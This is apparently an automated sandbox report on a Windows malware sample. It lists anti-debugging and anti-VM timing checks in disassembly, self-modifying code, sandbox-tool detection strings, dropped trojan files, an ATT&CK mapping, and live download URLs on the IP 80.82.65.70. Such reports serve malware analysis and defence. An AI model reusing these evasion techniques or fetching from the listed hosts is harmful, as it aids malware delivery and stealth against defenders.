Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D818F3 second address: 4D817BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FC1350240CDh 0x0000000f pop ebp 0x00000010 jmp 00007FC1350240CEh 0x00000015 jmp dword ptr [76291560h] 0x0000001b mov edi, edi 0x0000001d push ebp 0x0000001e mov ebp, esp 0x00000020 push esi 0x00000021 mov esi, dword ptr [ebp+08h] 0x00000024 push edi 0x00000025 mov edi, dword ptr fs:[00000018h] 0x0000002c cmp esi, 40h 0x0000002f jnc 00007FC1350240D7h 0x00000031 mov eax, dword ptr [ebp+0Ch] 0x00000034 mov dword ptr [edi+esi*4+00000E10h], eax 0x0000003b mov eax, 00000001h 0x00000040 pop edi 0x00000041 pop esi 0x00000042 pop ebp 0x00000043 retn 0008h 0x00000046 test eax, eax 0x00000048 je 00007FC135024181h 0x0000004e call 00007FC1350245ECh 0x00000053 mov edi, edi 0x00000055 push esi 0x00000056 call 00007FC135023726h 0x0000005b push 00000000h 0x0000005d call 00007FC13502404Ch 0x00000062 mov edi, edi 0x00000064 push ebp 0x00000065 mov ebp, esp 0x00000067 push esi 0x00000068 push dword ptr [00432010h] 0x0000006e mov esi, dword ptr [0042F0B8h] 0x00000074 call esi 0x00000076 mov edi, edi 0x00000078 pushad 0x00000079 pushad 0x0000007a mov bx, si 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D817BC second address: 4D81818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007FC134D1C056h 0x0000000c mov dword ptr [esp], ebp 0x0000000f jmp 00007FC134D1C050h 0x00000014 mov ebp, esp 0x00000016 jmp 00007FC134D1C050h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC134D1C057h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81818 second address: 4D50DA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp dword ptr [7629155Ch] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 mov ecx, dword ptr fs:[00000018h] 0x0000001b mov eax, dword ptr [ebp+08h] 0x0000001e mov dword ptr [ecx+34h], 00000000h 0x00000025 cmp eax, 40h 0x00000028 jnc 00007FC1350240CDh 0x0000002a mov eax, dword ptr [ecx+eax*4+00000E10h] 0x00000031 pop ebp 0x00000032 retn 0004h 0x00000035 test eax, eax 0x00000037 je 00007FC1350240E3h 0x00000039 mov eax, dword ptr [0043200Ch] 0x0000003e cmp eax, FFFFFFFFh 0x00000041 je 00007FC1350240D9h 0x00000043 mov esi, 0042F1C0h 0x00000048 push esi 0x00000049 call 00007FC1399739F2h 0x0000004e mov edi, edi 0x00000050 pushad 0x00000051 mov cx, FA43h 0x00000055 movzx eax, di 0x00000058 popad 0x00000059 push ebp 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4047C second address: 4D404B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC134D1C04Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx edx, cx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D404B1 second address: 4D404E8 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC1350240D4h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ax, bx 0x00000010 mov dh, B4h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC1350240D1h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D404E8 second address: 4D404EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D404EE second address: 4D404F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D404F2 second address: 4D40503 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cl, dh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40503 second address: 4D4051B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4051B second address: 4D405D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d jmp 00007FC134D1C04Fh 0x00000012 inc eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC134D1C054h 0x0000001a sbb esi, 31C460B8h 0x00000020 jmp 00007FC134D1C04Bh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FC134D1C058h 0x0000002c jmp 00007FC134D1C055h 0x00000031 popfd 0x00000032 popad 0x00000033 lock xadd dword ptr [ecx], eax 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FC134D1C04Ch 0x0000003e xor ax, 8578h 0x00000043 jmp 00007FC134D1C04Bh 0x00000048 popfd 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FC134D1C056h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90ABF second address: 4D90AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 call 00007FC1350240D9h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FC1350240CEh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov dl, 7Ch 0x0000001b mov al, 58h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90AFA second address: 4D90B1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C050h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, bx 0x00000011 mov bx, 7B6Ch 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90B1B second address: 4D90B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC1350240D0h 0x00000009 sub ecx, 22269188h 0x0000000f jmp 00007FC1350240CBh 0x00000014 popfd 0x00000015 mov esi, 545075FFh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC1350240D1h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90B5D second address: 4D90B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 825A4E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9CC5CE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9CAE7B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A51D81 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAD2A9 rdtsc 0_2_00AAD2A9
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1503Jump to behavior
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1344Jump to behavior
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1523Jump to behavior
Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1389Jump to behavior
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exe TID: 7568Thread sleep count: 58 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7568Thread sleep time: -116058s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572Thread sleep count: 45 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572Thread sleep time: -90045s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7484Thread sleep count: 55 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7484Thread sleep count: 74 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7484Thread sleep count: 57 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7484Thread sleep count: 87 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7484Thread sleep count: 50 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7484Thread sleep count: 50 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7548Thread sleep count: 1503 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7548Thread sleep time: -3007503s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7552Thread sleep count: 1344 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7552Thread sleep time: -2689344s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7576Thread sleep count: 39 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7576Thread sleep time: -78039s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7560Thread sleep count: 1523 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7560Thread sleep time: -3047523s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7564Thread sleep count: 1389 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7564Thread sleep time: -2779389s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004176E7 FindFirstFileExW,0_2_004176E7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B7794E FindFirstFileExW,0_2_04B7794E
Source: file.exe, file.exe, 00000000.00000002.2877232140.00000000009AE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.13.drBinary or memory string: VMware
Source: Amcache.hve.13.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.13.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.13.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: file.exe, 00000000.00000002.2878230701.0000000001021000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2769642556.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2535134365.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2880688079.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.13.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.drBinary or memory string: vmci.sys
Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.13.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.drBinary or memory string: VMware20,1
Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2877232140.00000000009AE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.13.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
Source: C:\Users\user\Desktop\file.exeFile opened: SICE
Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAD2A9 rdtsc 0_2_00AAD2A9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A54A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]0_2_10007A76
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]0_2_10005F25
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F6C9E3 push dword ptr fs:[00000030h]0_2_00F6C9E3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B60D90 mov eax, dword ptr fs:[00000030h]0_2_04B60D90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B6092B mov eax, dword ptr fs:[00000030h]0_2_04B6092B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EC0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc,0_2_00402EC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004099EA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A54A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDA3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A6E0 SetUnhandledExceptionFilter,0_2_0040A6E0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100056A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10002FDA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B69C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04B69C51
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B6A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B6A7B1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B6D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B6D00A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B6A947 SetUnhandledExceptionFilter,0_2_04B6A947
Source: file.exe, file.exe, 00000000.00000002.2877232140.00000000009AE000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: YJ.Program Manager
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D096AC cpuid 0_3_04D096AC
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004107E2 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_004107E2
Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.13.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.13.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		24
Virtualization/Sandbox Evasion		LSASS Memory781
Security Software Discovery		Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection		Security Account Manager24
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS3
Process Discovery		Distributed Component Object ModelInput Capture11
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
Software Packing		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSync223
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe100%AviraHEUR/AGEN.1320706
file.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]0%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Bunifu_UI_v1.5.3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp=0%Avira URL Cloudsafe
http://80.82.65.70/files/download21-573d1d5ce43f0%Avira URL Cloudsafe
http://80.82.65.70/soft/downloadvv0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadA0%Avira URL Cloudsafe
http://80.82.65.70/dll/keyk0%Avira URL Cloudsafe
http://80.82.65.70/dll/downloadC0%Avira URL Cloudsafe
http://80.82.65.70/dll/key;100%Avira URL Cloudmalware
http://80.82.65.70/files/download0/files/downloadA0%Avira URL Cloudsafe
http://80.82.65.70/dll/keyutils.dll0%Avira URL Cloudsafe
http://80.82.65.70/add?substr=mixtwo&s=three&sub=empW0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ax-0001.ax-msedge.net
150.171.27.10
truefalse
    		high
    fp2e7a.wpc.phicdn.net
    		192.229.221.95
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://80.82.65.70/soft/downloadfalse
        		high
        http://80.82.65.70/add?substr=mixtwo&s=three&sub=empfalse
          		high
          http://80.82.65.70/dll/downloadfalse
            		high
            http://80.82.65.70/dll/keyfalse
              		high
              http://80.82.65.70/files/downloadfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp=file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2880688079.00000000055C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://80.82.65.70/soft/downloadvvfile.exe, 00000000.00000002.2878230701.0000000001009000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
